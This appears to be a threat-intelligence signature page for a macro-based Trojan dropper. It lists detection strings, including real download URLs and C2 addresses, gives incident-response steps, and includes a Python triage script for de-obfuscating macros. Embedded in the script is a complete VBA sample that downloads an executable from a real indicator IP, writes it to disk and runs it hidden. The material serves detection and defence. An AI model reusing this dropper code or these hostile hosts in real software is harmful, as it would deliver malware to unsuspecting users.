Concrete signature match: Trojan (appears legitimate but performs malicious actions), platform Script, family Malgent
Trojan:Script/Malgent!MSR is a concrete detection of a script-based Trojan delivered as a malicious Office macro (VBA). The macro downloads additional payloads from remote servers and executes them: it rebuilds obfuscated download URLs at run time (Replace() stripping filler characters out of "http://"), fetches the payload with MSXML2.XMLHTTP, writes it to disk with ADODB.Stream under the user profile (Desktop, AppData, Temp, and the Startup folder), splits file extensions across string literals ("234.e" & "xe") to dodge naive ".exe" scans, and then launches the file, giving a multi-stage infection with persistence. The signature also carries PE strings (PDB paths, DLL names, a Global\ kernel-object name) from executables covered by the same detection.
Relevant strings associated with this threat (MACROHSTR_EXT entries come from Office macro content, PEHSTR_EXT entries from PE files):
- = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe" (MACROHSTR_EXT)
- http://45.78.21.150/boost/boosting.exe (MACROHSTR_EXT)
- = Replace("ht##tp##:##/##/ (MACROHSTR_EXT)
- = (Err.Number = 0) (MACROHSTR_EXT)
- = (Environ("temp") & "\" & (MACROHSTR_EXT)
- path_file = Environ$("USERPROFILE") + "\AppData\Roaming\" + "\" + path_dom + a + b + c (MACROHSTR_EXT)
- path_file = Environ$("USERPROFILE") & "\AppData\" + path_dom + ".ttp" (MACROHSTR_EXT)
- Variable2.savetofile "234.e" & "xe", 2 (MACROHSTR_EXT)
- ExecuteExcel4Macro Replace(UserForm1. (MACROHSTR_EXT)
- 2C:\Codes\Version2\pe_encrypt\Release\PECloner.pdb (PEHSTR)
- TmDbgLog.dll (PEHSTR_EXT)
- ssMUIDLL.dll (PEHSTR_EXT)
- arguments="https://d3727mhevtk2n4.cloudfront.net/srv-stg-agent (MACROHSTR_EXT)
- Call trenes("http://kuzov-remont.com/wp-admin/js/win.exe", (MACROHSTR_EXT)
- Environ("AppData") & "\Ds.exe") (MACROHSTR_EXT)
- Environ("Userprofile") & "\Men (MACROHSTR_EXT)
- Inicio\Programas\Inicio\Ds.exe") (MACROHSTR_EXT)
- Global\gfxQJsVUhkMOSadImwZFBbnpe2Gjv7HA (PEHSTR_EXT)
- explorer.exe (PEHSTR_EXT)
- svchost.exe (PEHSTR_EXT)
- del "C:\Documents and Settings\All Usersd (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- CymulateScreenShotTrojan.pdb (PEHSTR_EXT)
- i.ibb.co/q1B4wyW/nature-field-gra-130247647 (PEHSTR_EXT)
- sdsdsdsds.pdb (PEHSTR_EXT)
- DLL\test\Release\Dll1.pdb (PEHSTR_EXT)
- "C:\Windows\iexplore.exe" (PEHSTR_EXT)
- \Release\mfc.pdbd (PEHSTR_EXT)
- zh-CN/NUSData/M2052Hongyu.voiceAssistant.unt (PEHSTR_EXT)
- zh-CN/NUSData/M2052Kangkang.keyboard.unt (PEHSTR_EXT)
- https://www.cuochiperungiorno.it/ (PEHSTR_EXT)
- _Setup.exe (PEHSTR_EXT)
- https://tapestryoftruth.com/ (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- E:\PROJETOS2023\CSHARP\RAT\MXNOBUGMAG\Bin\Release\msedge_elf.pdb (PEHSTR_EXT)
- E:\PROJETOS2023\CSHARP\RAT\MXNOBUGMAG\Bin\Release\VCRUNTIME140.pdb (PEHSTR_EXT)
- AppApi.dll (PEHSTR_EXT)
- D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb (PEHSTR_EXT)
- G:\repos\ApiApp\AppApi\obj\Release\net9.0\win-x86\AppApi.pdb (PEHSTR_EXT)
- info-sec.jp/attach (PEHSTR_EXT)
- stgsec-info.jp/acon (PEHSTR_EXT)
- PdfAttachProduction.exe (PEHSTR_EXT)
- cm74336.tw1.ru/calc.execalc.exesrc (PEHSTR_EXT)
- =createobject("msxml2.xmlhttp")http_obj.open"post","http://188.130.234.189/wait.php (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Associated SHA-256: 22d4b6abcb913f72e56915b76b6baaadacc48719e42b1776cbd5fc263da36a89

Recommended response: immediately isolate the affected host; run a full endpoint scan with updated security software to confirm removal; identify and delete the dropped executables (for example quotation.exe on the Desktop, Ds.exe under AppData, and files written to %TEMP%) together with any persistence entries, such as the copy placed in the Startup folder (Inicio\Programas\Inicio is the Spanish-locale Startup path seen in the strings) or a scheduled task or BITS job; and block the associated C2/download indicators at the network perimeter (45.78.21.150, 188.130.234.189, kuzov-remont.com, cm74336.tw1.ru, d3727mhevtk2n4.cloudfront.net). Block the specific CloudFront hostname rather than cloudfront.net as a whole, which is shared infrastructure. Finally, review the Office macro trust settings that allowed the document to run code in the first place.
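The macro constructs listed above (Replace()-obfuscated URL, MSXML2.XMLHTTP download, ADODB.Stream SaveToFile, Environ() drop paths, split ".e" & "xe" extension) can be triaged offline once the VBA source has been extracted from the document (for example with olevba). The script below is an added example, not part of this signature page or of any vendor engine: it folds concatenated string literals, evaluates literal Replace() calls, and then reports the decoded URLs, the drop paths and the stages it recognises. The VBA sample embedded in it is constructed for the demo; it reuses the download URL from the string list above but never contacts it.

```python
import re

# Constructed sample macro for the demo. It reproduces the constructs from the
# string list (Replace()-obfuscated URL, XMLHTTP download, ADODB.Stream
# SaveToFile, split extension, Environ() drop paths, Shell). The URL is the one
# from the string list; nothing in this script performs network access.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim u As String, path_file As String
    u = Replace("ht##tp##:##/##/45.78.21.150/boost/boosting.exe", "#", "")
    Set http_obj = CreateObject("MSXML2.XMLHTTP")
    http_obj.Open "GET", u, False
    http_obj.Send
    Set Variable2 = CreateObject("ADODB.Stream")
    Variable2.Type = 1: Variable2.Open: Variable2.Write http_obj.responseBody
    path_file = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe"
    Variable2.SaveToFile path_file, 2
    Variable2.SaveToFile Environ("temp") & "\" & "234.e" & "xe", 2
    If (Err.Number = 0) Then Shell path_file, vbHide
End Sub
'''

# Two adjacent string literals joined by & or + (VBA has no escape sequences,
# so a literal is simply everything between two double quotes).
CONCAT = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')
# Replace("text", "find", "with") where all three arguments are literals.
REPLACE_CALL = re.compile(
    r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.I)
URL = re.compile(r'https?://[^\s"\'<>]+', re.I)
# Environ("VAR") & "\tail" after folding: the path the payload is written to.
ENVIRON_PATH = re.compile(r'Environ\$?\(\s*"(\w+)"\s*\)\s*[&+]\s*"([^"]*)"', re.I)
# "234.e" & "xe": an extension split across two literals to dodge ".exe" scans.
SPLIT_EXT = re.compile(r'"[^"]*\.[A-Za-z]{0,2}"\s*[&+]\s*"[A-Za-z]{1,3}"')

INDICATORS = [
    ("xmlhttp_download", re.compile(r'msxml2\.xmlhttp|winhttp\.winhttprequest', re.I)),
    ("stream_savetofile", re.compile(r'adodb\.stream|\.savetofile', re.I)),
    ("environ_drop_path", re.compile(r'Environ\$?\(', re.I)),
    ("execution", re.compile(r'\bShell\b|ExecuteExcel4Macro|WScript\.Shell', re.I)),
    ("error_swallowing", re.compile(r'On Error Resume Next|Err\.Number\s*=\s*0', re.I)),
]


def fold_literals(text):
    """Merge adjacent string literals joined by & or + until nothing changes."""
    while True:
        new = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if new == text:
            return text
        text = new


def apply_replace_calls(text):
    """Evaluate Replace() calls with literal arguments, as VBA would at run time."""
    def evaluate(m):
        source, find, repl = m.group(1), m.group(2), m.group(3)
        if not find:            # VBA returns the input unchanged for an empty find string
            return '"' + source + '"'
        return '"' + source.replace(find, repl) + '"'
    return REPLACE_CALL.sub(evaluate, text)


def extract_drop_paths(decoded):
    """Return drop paths as %VAR%\\tail strings from folded Environ() expressions."""
    return [f"%{var.upper()}%{tail}" for var, tail in ENVIRON_PATH.findall(decoded)]


def triage(vba):
    """Decode the macro's string building and summarise what it downloads, drops and runs."""
    raw_urls = set(URL.findall(vba))
    decoded = fold_literals(apply_replace_calls(fold_literals(vba)))
    urls = sorted(set(URL.findall(decoded)))
    indicators = [name for name, rx in INDICATORS if rx.search(vba)]
    if set(urls) - raw_urls:          # a URL only appears after de-obfuscation
        indicators.append("obfuscated_url")
    if SPLIT_EXT.search(vba):
        indicators.append("split_extension")
    stages = {"xmlhttp_download", "stream_savetofile", "execution"}
    if stages <= set(indicators):
        verdict = "download-and-execute dropper"
    elif indicators:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"urls": urls, "drop_paths": extract_drop_paths(decoded),
            "indicators": indicators, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The decoded URLs and drop paths are what you feed into perimeter blocks and endpoint hunts; the verdict is only a triage aid, since a macro that builds its strings with Chr() or from form controls (ExecuteExcel4Macro Replace(UserForm1. in the list above) will not fold with literal-only rules and still needs a sandbox run or a proper VBA emulator.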